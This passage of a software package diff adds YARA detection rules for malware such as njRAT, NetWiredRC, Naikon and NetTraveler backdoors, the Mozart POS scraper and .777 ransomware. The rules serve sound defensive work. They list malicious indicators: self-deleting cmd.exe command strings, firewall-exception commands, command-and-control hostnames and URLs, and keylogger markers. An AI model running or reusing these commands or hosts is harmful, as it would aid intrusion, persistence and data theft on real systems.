+		$o = "rdp.dll"				//may raise some FP
+		$p = "rt_2_4.dll"
+		$q = "socks5.dll"			//may raise some FP
+		$r = "spySpread.dll"
+		$s = "w2chek4_4.dll"
+		$t = "w2chek4_6.dll"
+	
+	condition:
+		any of them
+}
+
+rule callTogether_certificate
+{
+    meta:
+        Author      = "Fireeye Labs"
+        Date        = "2014/11/03" 
+        Description = "detects binaries signed with the CallTogether certificate"
+        Reference   = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"
+
+    strings:
+        $serial = { 45 21 56 C3 B3 FB 01 76 36 5B DB 5B 77 15 BC 4C }
+        $o = "CallTogether, Inc."
+
+    condition:
+        $serial and $o
+}
+
+rule qti_certificate
+{
+    meta:
+        Author      = "Fireeye Labs"
+        Date        = "2014/11/03" 
+        Description = "detects binaries signed with the QTI International Inc certificate"
+        Reference   = "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html"
+
+    strings:
+        $cn = "QTI International Inc"
+        $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 }
+
+    condition:
+        $cn and $serial
+}
+
+rule DownExecute_A
+{
+	meta:
+        Author      = "PwC Cyber Threat Operations :: @tlansec"
+        Date        = "2015/04/27"
+        Description = "Malware is often wrapped/protected, best to run on memory"
+        Reference   = "http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html"
+
+    strings:
+        $winver1 = "win 8.1"
+        $winver2 = "win Server 2012 R2"
+        $winver3 = "win Srv 2012"
+        $winver4 = "win srv 2008 R2"
+        $winver5 = "win srv 2008"
+        $winver6 = "win vsta"
+        $winver7 = "win srv 2003 R2"
+        $winver8 = "win hm srv"
+        $winver9 = "win Strg srv 2003"
+        $winver10 = "win srv 2003"
+        $winver11 = "win XP prof x64 edt"
+        $winver12 = "win XP"
+        $winver13 = "win 2000"
+
+        $pdb1 = "D:\\Acms\\2\\docs\\Visual Studio 2013\\Projects\\DownloadExcute\\DownloadExcute\\Release\\DownExecute.pdb"
+        $pdb2 = "d:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h"
+        $pdb3 = ":\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h"
+        $pdb4 = "\\downloadexcute\\downexecute\\"
+
+        $magic1 = "<Win Get Version Info Name Error"
+        $magic2 = "P@$sw0rd$nd"
+        $magic3 = "$t@k0v2rF10w"
+        $magic4 = "|*|123xXx(Mutex)xXx321|*|6-21-2014-03:06PM" wide
+
+		$str1 = "Download Excute" ascii wide fullword
+        $str2 = "EncryptorFunctionPointer %d"
+        $str3 = "%s\\%s.lnk"
+        $str4 = "Mac:%s-Cpu:%s-HD:%s"
+        $str5 = "feed back responce of host"
+        $str6 = "GET Token at host"
+        $str7 = "dwn md5 err"
+
+    condition:
+        all of ($winver*) or any of ($pdb*) or any of ($magic*) or 2 of ($str*)
+}
+
+rule CVE_2015_1674_CNGSYS {
+	meta:
+		description = "Detects exploits for CVE-2015-1674"
+		author = "Florian Roth"
+		reference = "http://www.binvul.com/viewthread.php?tid=508"
+		reference2 = "https://github.com/Neo23x0/Loki/blob/master/signatures/exploit_cve_2015_1674.yar"
+		date = "2015-05-14"
+		hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36"
+	strings:
+		$s1 = "\\Device\\CNG" fullword wide
+		
+		$s2 = "GetProcAddress" fullword ascii
+		$s3 = "LoadLibrary" ascii
+		$s4 = "KERNEL32.dll" fullword ascii
+		$s5 = "ntdll.dll" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 60KB and all of them
+}
+
+rule Ap0calypse
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Ap0calypse"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "Ap0calypse"
+		$b = "Sifre"
+		$c = "MsgGoster"
+		$d = "Baslik"
+		$e = "Dosyalars"
+		$f = "Injecsiyon"
+
+	condition:
+		all of them
+}
+rule Arcom
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Arcom"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+        
+    strings:
+        $a1 = "CVu3388fnek3W(3ij3fkp0930di"
+        $a2 = "ZINGAWI2"
+        $a3 = "clWebLightGoldenrodYellow"
+        $a4 = "Ancestor for '%s' not found" wide
+        $a5 = "Control-C hit" wide
+        $a6 = {A3 24 25 21}
+        
+    condition:
+        all of them
+}
+rule Bandook
+{
+
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/bandook"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+        
+    strings:
+    		$a = "aaaaaa1|"
+            $b = "aaaaaa2|"
+            $c = "aaaaaa3|"
+            $d = "aaaaaa4|"
+			$e = "aaaaaa5|"
+			$f = "%s%d.exe"
+			$g = "astalavista"
+			$h = "givemecache"
+			$i = "%s\\system32\\drivers\\blogs\\*"
+			$j = "bndk13me"
+			
+
+        
+    condition:
+    		all of them
+}
+
+rule DarkRAT
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/DarkRAT"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "@1906dark1996coder@"
+		$b = "SHEmptyRecycleBinA"
+		$c = "mciSendStringA"
+		$d = "add_Shutdown"
+		$e = "get_SaveMySettingsOnExit"
+		$f = "get_SpecialDirectories"
+		$g = "Client.My"
+
+	condition:
+		all of them
+}
+rule Greame
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Greame"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+		
+	strings:
+    		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
+            $b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
+            $c = "EditSvr"
+            $d = "TLoader"
+			$e = "Stroks"
+            $f = "Avenger by NhT"
+			$g = "####@####"
+			$h = "GREAME"
+			
+
+        
+    condition:
+    		all of them
+}
+rule LostDoor
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/LostDoor"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+        
+    strings:
+    	$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}
+        $a1 = "*mlt* = %"
+        $a2 = "*ip* = %"
+        $a3 = "*victimo* = %"
+        $a4 = "*name* = %"
+        $b5 = "[START]"
+        $b6 = "[DATA]"
+        $b7 = "We Control Your Digital World" wide ascii
+        $b8 = "RC4Initialize" wide ascii
+        $b9 = "RC4Decrypt" wide ascii
+        
+    condition:
+    	all of ($a*) or all of ($b*)
+}
+rule LuxNet
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/LuxNet"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "GetHashCode"
+		$b = "Activator"
+		$c = "WebClient"
+		$d = "op_Equality"
+		$e = "dickcursor.cur" wide
+		$f = "{0}|{1}|{2}" wide
+
+	condition:
+		all of them
+}
+rule Pandora
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Pandora"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "Can't get the Windows version"
+		$b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}="
+		$c = "JPEG error #%d" wide
+		$d = "Cannot assign a %s to a %s" wide
+		$g = "%s, ProgID:"
+		$h = "clave"
+		$i = "Shell_TrayWnd"
+		$j = "melt.bat"
+		$k = "\\StubPath"
+		$l = "\\logs.dat"
+		$m = "1027|Operation has been canceled!"
+		$n = "466|You need to plug-in! Double click to install... |"
+		$0 = "33|[Keylogger Not Activated!]"
+
+	condition:
+		all of them
+}
+rule Paradox
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Paradox"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "ParadoxRAT"
+		$b = "Form1"
+		$c = "StartRMCam"
+		$d = "Flooders"
+		$e = "SlowLaris"
+		$f = "SHITEMID"
+		$g = "set_Remote_Chat"
+
+	condition:
+		all of them
+}
+rule Punisher
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Punisher"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "abccba"
+		$b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
+		$c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
+		$d = "SpyTheSpy" wide ascii
+		$e = "wireshark" wide
+		$f = "apateDNS" wide
+		$g = "abccbaDanabccb"
+
+	condition:
+		all of them
+}
+rule SmallNet
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/SmallNet"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+		
+	strings:
+		$split1 = "!!<3SAFIA<3!!"
+		$split2 = "!!ElMattadorDz!!"
+		$a1 = "stub_2.Properties"
+		$a2 = "stub.exe" wide
+		$a3 = "get_CurrentDomain"
+
+	condition:
+		($split1 or $split2) and (all of ($a*))
+}
+rule Base64_encoded_Executable {
+	meta:
+		description = "Detects an base64 encoded executable (often embedded)"
+		author = "Florian Roth"
+		date = "2015-05-28"
+		score = 50
+	strings:
+		$s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" // 14 samples in goodware archive
+		$s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" // 26 samples in goodware archive
+		$s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" // 75 samples in goodware archive
+		$s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" // 168 samples in goodware archive
+		$s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" // 28,529 samples in goodware archive
+	condition:
+		1 of them
+}
+rule CredStealESY : For CredStealer
+{
+ meta:
+description = "Generic Rule to detect the CredStealer Malware"
+author = "IsecG – McAfee Labs"
+date = "2015/05/08"
+strings:
+$my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide //malware trying to get keyboard layout
+$my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8} //specific decryption module
+ condition:
+$my_hex_string and $my_hex_string2
+}
diff -Nru remnux-rules-0.0.3/yara/malware/mozart.yar remnux-rules-0.0.4/yara/malware/mozart.yar
--- remnux-rules-0.0.3/yara/malware/mozart.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/mozart.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Mozart
+{
+   meta:
+       author = "Nick Hoffman - Morphick Inc"
+       description = "Detects samples of the Mozart POS RAM scraping utility"
+       reference = "http://securitykitten.github.io/the-mozart-ram-scraper/"
+   strings:
+       $pdb = "z:\\Slender\\mozart\\mozart\\Release\\mozart.pdb" nocase wide ascii
+       $output = {67 61 72 62 61 67 65 2E 74 6D 70 00}
+       $service_name = "NCR SelfServ Platform Remote Monitor" nocase wide ascii
+       $service_name_short = "NCR_RemoteMonitor"
+       $encode_data = {B8 08 10 00 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 8B AC 24 14 10 00 00 89 84 24 0C 10 00 00 56 8B C5 33 F6 33 DB 8D 50 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C2 89 44 24 0C ?? ?? 8B 94 24 1C 10 00 00 57 8B FD 2B FA 89 7C 24 10 ?? ?? 8B 7C 24 10 8A 04 17 02 86 E0 BA 40 00 88 02 B8 ?? ?? ?? ?? 46 8D 78 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C7 3B F0 ?? ?? 33 F6 8B C5 43 42 8D 78 01 8A 08 40 84 C9 ?? ?? 2B C7 3B D8 ?? ?? 5F 8B B4 24 1C 10 00 00 8B C5 C6 04 33 00 8D 50 01 8A 08 40 84 C9 ?? ?? 8B 8C 24 20 10 00 00 2B C2 51 8D 54 24 14 52 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B D6 5E 8D 44 24 0C 8B C8 5D 2B D1 5B 8A 08 88 0C 02 40 84 C9 ?? ?? 8B 8C 24 04 10 00 00 E8 ?? ?? ?? ?? 81 C4 08 10 00 00}
+   condition:
+      any of ($pdb, $output, $encode_data) or
+      all of ($service*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/MW_elknot_xor.yar remnux-rules-0.0.4/yara/malware/MW_elknot_xor.yar
--- remnux-rules-0.0.3/yara/malware/MW_elknot_xor.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/MW_elknot_xor.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule elknot_xor : malware 
+{
+meta:
+    author = "liuya@360.cn"
+    date = "2016-04-25"
+    description = "elknot/Billgates variants with XOR like C2 encryption scheme"
+    reference = "http://liuya0904.blogspot.tw/2016/04/new-elknotbillgates-variant-with-xor.html"
+    sample = "474429d9da170e733213940acc9a2b1c, 2579aa65a28c32778790ec1c673abc49"
+
+strings:
+   //md5=474429d9da170e733213940acc9a2b1c
+   /*
+   seg000:08130801 68 00 09 13 08                          push    offset dword_8130900
+    seg000:08130806 83 3D 30 17 13 08 02                    cmp     ds:dword_8131730, 2
+    seg000:0813080D 75 07                                   jnz     short loc_8130816
+    seg000:0813080F 81 04 24 00 01 00 00                    add     dword ptr [esp], 100h
+    seg000:08130816                         loc_8130816:                           
+    seg000:08130816 50                                      push    eax
+    seg000:08130817 E8 15 00 00 00                          call    sub_8130831
+    seg000:0813081C E9 C8 F6 F5 FF                          jmp     near ptr 808FEE9h
+   */
+    $decrypt_c2_func_1 = {08 83 [5] 02 75 07 81 04 24 00 01 00 00 50 e8 [4] e9}
+
+    // md5=2579aa65a28c32778790ec1c673abc49
+    /*
+    .rodata:08104D20 E8 00 00 00 00                          call    $+5
+    .rodata:08104D25 87 1C 24                                xchg    ebx, [esp+4+var_4] ;
+    .rodata:08104D28 83 EB 05                                sub     ebx, 5
+    .rodata:08104D2B 8D 83 00 FD FF FF                       lea     eax, [ebx-300h]
+    .rodata:08104D31 83 BB 10 CA 02 00 02                    cmp     dword ptr [ebx+2CA10h], 2
+    .rodata:08104D38 75 05                                   jnz     short loc_8104D3F
+    .rodata:08104D3A 05 00 01 00 00                          add     eax, 100h
+    .rodata:08104D3F                         loc_8104D3F:                           
+    .rodata:08104D3F 50                                      push    eax
+    .rodata:08104D40 FF 74 24 10                             push    [esp+8+strsVector]
+*/
+$decrypt_c2_func_2 = {e8 00 00 00 00 87 [2] 83 eb 05 8d 83 [4] 83 bb [4] 02 75 05}
+
+condition:
+    1 of ($decrypt_c2_func_*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/MW_Ransomware_777.yar remnux-rules-0.0.4/yara/malware/MW_Ransomware_777.yar
--- remnux-rules-0.0.3/yara/malware/MW_Ransomware_777.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/MW_Ransomware_777.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+rule legion_777
+{
+    meta:
+        author = "Daxda (https://github.com/Daxda)"
+        date = "2016/6/6"
+        description = "Detects an UPX-unpacked .777 ransomware binary."
+        ref = "https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion"
+        category = "Ransomware"
+        sample = "SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548"
+
+    strings:
+        $s1 = "http://tuginsaat.com/wp-content/themes/twentythirteen/stats.php"
+        $s2 = "read_this_file.txt" wide // Ransom note filename.
+        $s3 = "seven_legion@india.com" // Part of the format string used to rename files.
+        $s4 = {46 4f 52 20 44 45 43 52 59 50 54 20 46 49 4c 45 53 0d 0a 53 45 4e 44 20 4f
+               4e 45 20 46 49 4c 45 20 49 4e 20 45 2d 4d 41 49 4c 0d 0a 73 65 76 65 6e 5f
+               6c 65 67 69 6f 6e 40 69 6e 64 69 61 2e 63 6f 6d } // Ransom note content.
+        $s5 = "%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777" // Renaming format string.
+
+    condition:
+        4 of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Naikon.yar remnux-rules-0.0.4/yara/malware/Naikon.yar
--- remnux-rules-0.0.3/yara/malware/Naikon.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Naikon.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,86 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NaikonCode : Naikon Family 
+{
+    meta:
+        description = "Naikon code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+    
+    strings:
+        // decryption
+        $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eah, 1fh
+        $ = { 35 5A 01 00 00} // xor eax, 15ah
+        $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh
+    
+    condition:
+        all of them
+}
+
+rule NaikonStrings : Naikon Family
+{
+    meta:
+        description = "Naikon Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "NOKIAN95/WEB"
+        $ = "/tag=info&id=15"
+        $ = "skg(3)=&3.2d_u1"
+        $ = "\\Temp\\iExplorer.exe"
+        $ = "\\Temp\\\"TSG\""
+        
+    condition:
+       any of them
+}
+
+rule Naikon : Family
+{
+    meta:
+        description = "Naikon"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        NaikonCode or NaikonStrings
+}
+rule Backdoor_Naikon_APT_Sample1 {
+	meta:
+		description = "Detects backdoors related to the Naikon APT"
+		author = "Florian Roth"
+		reference = "https://goo.gl/7vHyvh"
+		date = "2015-05-14"
+		hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
+		hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
+	strings:
+		$x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
+		$x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
+		$x2 = "greensky27.vicp.net" fullword ascii
+		$x3 = "\\tempvxd.vxd.dll" fullword wide
+		$x4 = "otna.vicp.net" fullword ascii
+		$x5 = "smithking19.gicp.net" fullword ascii
+		
+		$s1 = "User-Agent: webclient" fullword ascii
+		$s2 = "\\User.ini" fullword ascii
+		$s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
+		$s4 = "\\UserProfile.dll" fullword wide
+		$s5 = "Connection:Keep-Alive: %d" fullword ascii
+		$s6 = "Referer: http://%s:%d/" fullword ascii
+		$s7 = "%s %s %s %d %d %d " fullword ascii
+		$s8 = "%s--%s" fullword wide
+		$s9 = "Run File Success!" fullword wide
+		$s10 = "DRIVE_REMOTE" fullword wide
+		$s11 = "ProxyEnable" fullword wide
+		$s12 = "\\cmd.exe" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and
+		(
+			1 of ($x*) or 7 of ($s*)
+		)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/naspyupdate.yar remnux-rules-0.0.4/yara/malware/naspyupdate.yar
--- remnux-rules-0.0.3/yara/malware/naspyupdate.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/naspyupdate.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,51 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule nAspyUpdateCode : nAspyUpdate Family 
+{
+    meta:
+        description = "nAspyUpdate code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+    
+    strings:
+        // decryption loop in dropper
+        $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 }
+        
+    condition:
+        any of them
+}
+
+rule nAspyUpdateStrings : nAspyUpdate Family
+{
+    meta:
+        description = "nAspyUpdate Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    strings:
+        $ = "\\httpclient.txt"
+        $ = "password <=14"
+        $ = "/%ldn.txt"
+        $ = "Kill You\x00"
+        
+    condition:
+        any of them
+}
+
+rule nAspyUpdate : Family
+{
+    meta:
+        description = "nAspyUpdate"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    condition:
+        nAspyUpdateCode or nAspyUpdateStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/NetTraveler.yar remnux-rules-0.0.4/yara/malware/NetTraveler.yar
--- remnux-rules-0.0.3/yara/malware/NetTraveler.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/NetTraveler.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,94 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NetpassStrings : NetPass Variant {
+
+        meta:
+                description = "Identifiers for netpass variant"
+                author = "Katie Kleemola"
+                last_updated = "2014-05-29"
+
+        strings:
+                $exif1 = "Device Protect ApplicatioN" wide
+                $exif2 = "beep.sys" wide //embedded exe name
+                $exif3 = "BEEP Driver" wide //embedded exe description
+
+                $string1 = "\x00NetPass Update\x00"
+                $string2 = "\x00%s:DOWNLOAD\x00"
+                $string3 = "\x00%s:UPDATE\x00"
+                $string4 = "\x00%s:uNINSTALL\x00"
+
+        condition:
+                all of ($exif*) or any of ($string*)
+
+}
+
+rule NetPass : Variant {
+        meta:
+                description = "netpass variant"
+                author = "Katie Kleemola"
+                last_updated = "2014-07-08"
+        condition:
+                NetpassStrings
+}
+
+rule NetTravStrings : NetTraveler Family {
+
+
+	meta:
+        	description = "Identifiers for NetTraveler DLL"
+		author = "Katie Kleemola"
+        	last_updated = "2014-05-20"
+
+	strings:
+		//network strings
+		$ = "?action=updated&hostid="
+		$ = "travlerbackinfo"
+		$ = "?action=getcmd&hostid="
+		$ = "%s?action=gotcmd&hostid="
+		$ = "%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext="
+
+		//debugging strings
+		$ = "\x00Method1 Fail!!!!!\x00"
+		$ = "\x00Method3 Fail!!!!!\x00"
+		$ = "\x00method currect:\x00"
+		$ = /\x00\x00[\w\-]+ is Running!\x00\x00/
+		$ = "\x00OtherTwo\x00"
+
+	condition:
+		any of them
+
+}
+
+rule NetTravExports : NetTraveler Family {
+
+	meta:
+		description = "Export names for dll component"
+		author = "Katie Kleemola"
+		last_updated = "2014-05-20"
+	
+	strings:
+		//dll component exports
+		$ = "?InjectDll@@YAHPAUHWND__@@K@Z"
+		$ = "?UnmapDll@@YAHXZ"
+		$ = "?g_bSubclassed@@3HA"
+		
+	condition:
+		any of them
+}
+
+rule NetTraveler : Family {
+	meta:
+		description = "Nettravelr"
+		author = "Katie Kleemola"
+		last_updated = "2014-07-08"
+	
+	condition:
+		NetTravExports or NetTravStrings or NetpassStrings
+
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/netwiredRC.yar remnux-rules-0.0.4/yara/malware/netwiredRC.yar
--- remnux-rules-0.0.3/yara/malware/netwiredRC.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/netwiredRC.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule NetWiredRC_B : rat 
+{
+	meta:
+		description = "NetWiredRC"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2014-12-23"
+		filetype = "memory"
+		version = "1.1" 
+
+	strings:
+		$mutex = "LmddnIkX"
+
+		$str1 = "%s.Identifier"
+		$str2 = "%d:%I64u:%s%s;"
+		$str3 = "%s%.2d-%.2d-%.4d"
+		$str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
+		$str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"
+		
+		$klg1 = "[Backspace]"
+		$klg2 = "[Enter]"
+		$klg3 = "[Tab]"
+		$klg4 = "[Arrow Left]"
+		$klg5 = "[Arrow Up]"
+		$klg6 = "[Arrow Right]"
+		$klg7 = "[Arrow Down]"
+		$klg8 = "[Home]"
+		$klg9 = "[Page Up]"
+		$klg10 = "[Page Down]"
+		$klg11 = "[End]"
+		$klg12 = "[Break]"
+		$klg13 = "[Delete]"
+		$klg14 = "[Insert]"
+		$klg15 = "[Print Screen]"
+		$klg16 = "[Scroll Lock]"
+		$klg17 = "[Caps Lock]"
+		$klg18 = "[Alt]"
+		$klg19 = "[Esc]"
+		$klg20 = "[Ctrl+%c]"
+
+	condition: 
+		$mutex or (1 of ($str*) and 1 of ($klg*))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Njrat.yar remnux-rules-0.0.4/yara/malware/Njrat.yar
--- remnux-rules-0.0.3/yara/malware/Njrat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Njrat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,55 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Njrat
+{
+    meta:
+        description = "Njrat"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /(F)romBase64String/
+        $string2 = /(B)ase64String/
+        $string3 = /(C)onnected/ wide ascii
+        $string4 = /(R)eceive/
+        $string5 = /(S)end/ wide ascii
+        $string6 = /(D)ownloadData/ wide ascii
+        $string7 = /(D)eleteSubKey/ wide ascii
+        $string8 = /(g)et_MachineName/
+        $string9 = /(g)et_UserName/
+        $string10 = /(g)et_LastWriteTime/
+        $string11 = /(G)etVolumeInformation/
+        $string12 = /(O)SFullName/ wide ascii
+        $string13 = /(n)etsh firewall/ wide
+        $string14 = /(c)md\.exe \/k ping 0 & del/ wide
+        $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
+        $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
+        $string17 = {7C 00 27 00 7C 00 27 00 7C}
+
+    condition:
+        10 of them
+}
+rule njrat1
+{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2015-05-27"
+        description = "Identify njRat"
+    strings:
+        $a1 = "netsh firewall add allowedprogram " wide
+        $a2 = "SEE_MASK_NOZONECHECKS" wide
+
+        $b1 = "[TAP]" wide
+        $b2 = " & exit" wide
+
+        $c1 = "md.exe /k ping 0 & del " wide
+        $c2 = "cmd.exe /c ping 127.0.0.1 & del" wide
+        $c3 = "cmd.exe /c ping" wide
+    condition:
+        1 of ($a*) and 1 of ($b*) and 1 of ($c*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Notepad.yar remnux-rules-0.0.4/yara/malware/Notepad.yar
--- remnux-rules-0.0.3/yara/malware/Notepad.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Notepad.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule TROJAN_Notepad {
+    meta:
+        Author = "RSA_IR"
+        Date     = "4Jun13"
+        File     = "notepad.exe v 1.1"
+        MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
+    strings:
+        $s1 = "75BAA77C842BE168B0F66C42C7885997"
+        $s2 = "B523F63566F407F3834BCC54AAA32524"
+    condition:
+        $s1 or $s2
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/NSFree.yar remnux-rules-0.0.4/yara/malware/NSFree.yar
